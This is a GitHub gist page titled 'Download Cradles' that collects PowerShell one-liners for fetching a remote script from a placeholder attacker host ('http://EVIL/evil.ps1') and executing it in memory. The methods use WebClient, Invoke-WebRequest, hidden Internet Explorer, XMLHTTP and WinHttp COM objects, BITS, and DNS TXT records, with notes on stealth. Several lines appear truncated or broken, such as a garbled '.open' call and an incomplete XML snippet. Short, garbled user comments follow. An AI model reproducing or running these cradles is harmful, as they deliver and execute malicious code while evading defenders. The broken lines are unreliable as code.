Skip to content

Instantly share code, notes, and snippets.

Last active September 16, 2024 18:36
Show Gist options
  • Save HarmJ0y/bb48307ffa663256e239 to your computer and use it in GitHub Desktop.
Save HarmJ0y/bb48307ffa663256e239 to your computer and use it in GitHub Desktop.
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$'GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$'GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
# using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
# DNS TXT approach from PowerBreach (
# code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
# from @subtee -
<?xml version="1.0"?>
$a = New-Object System.Xml.XmlDocument
$a.command.a.execute | iex
Copy link

scg4508 commented Jul 4, 2023


Copy link

harethe commented Jul 10, 2023

hg$hf bvf vfgot

Copy link


Copy link


Copy link

geekecom commented Dec 9, 2023


Copy link

goodstuff. Eat that Fluff

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment